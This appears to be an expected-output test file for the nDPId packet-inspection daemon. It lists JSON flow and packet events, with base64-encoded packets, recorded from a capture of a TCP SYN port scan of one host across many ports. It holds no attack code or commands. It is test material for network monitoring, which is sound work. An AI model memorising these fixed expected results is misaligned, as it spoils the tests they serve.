+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAscwEAAC4Gp3GsEAAIQA2GNIzSBH3dUoMYAAAAAGACDAAoEgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs3eAAACwGPpKsEAAIQA2GNIzTBEHdU4MZAAAAAGACBAAwSwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+toAACwGIZisEAAIQA2GNIzTeOfdU4MZAAAAAGACBAC7pAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAscqoAADUGoMisEAAIQA2GNIzTB9rdU4MZAAAAAGACCAAosgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX4AAC0G2fSsEAAIQA2GNIzTG7\/dU4MZAAAAAGACCAAUzQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJYAADcGvNysEAAIQA2GNIzTGgvdU4MZAAAAAGACEAAOgQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+30AADAGHPWsEAAIQA2GNIzTTv3dU4MZAAAAAGACBADljgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRoAAC4GpVisEAAIQA2GNIzTDIvdU4MZAAAAAGACDAAgAQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsb7MAAC0Gq7+sEAAIQA2GNIzTAbzdU4MZAAAAAGACCAAu0AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jwAADYGNDasEAAIQA2GNIzTFO3dU4MZAAAAAGACDAAXnwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAsrI8AADoGYeOsEAAIQA2GNIzTC17dU4MZAAAAAGACDAAhLgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs0rwAAC8GRrasEAAIQA2GNIzTEOHdU4MZAAAAAGACEAAXqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsBRoAAC0GFlmsEAAIQA2GNIzTHOrdU4MZAAAAAGACCAATogAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsYVAAADMGtCKsEAAIQA2GNIzTFgHdU4MZAAAAAGACEAASiwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CgAAC4GLkqsEAAIQA2GNIzTC73dU4MZAAAAAGACDAAgzwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsAbcAACoGHLysEAAIQA2GNIzTF3bdU4MZAAAAAGACDAAVFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SoAADkGKkisEAAIQA2GNIzTBDjdU4MZAAAAAGACCAAsVAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs+G4AAC4GIgSsEAAIQA2GNIzTB9bdU4MZAAAAAGACDAAktgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsRx0AACwG1VWsEAAIQA2GNIzTD57dU4MZAAAAAGACBAAk7gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsiHkAADAGj\/msEAAIQA2GNIzTJw7dU4MZAAAAAGACBAANfgAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NkAADgGE5msEAAIQA2GNIzTw1LdU4MZAAAAAGACBABxOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs6hsAAC0GMVesEAAIQA2GNIzTC8PdU4MZAAAAAGACCAAkyQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFEAAC4GUiGsEAAIQA2GNIzTC7vdU4MZAAAAAGACDAAg0QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsTisAADAGykesEAAIQA2GNIzTGzndU4MZAAAAAGACBAAZUwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
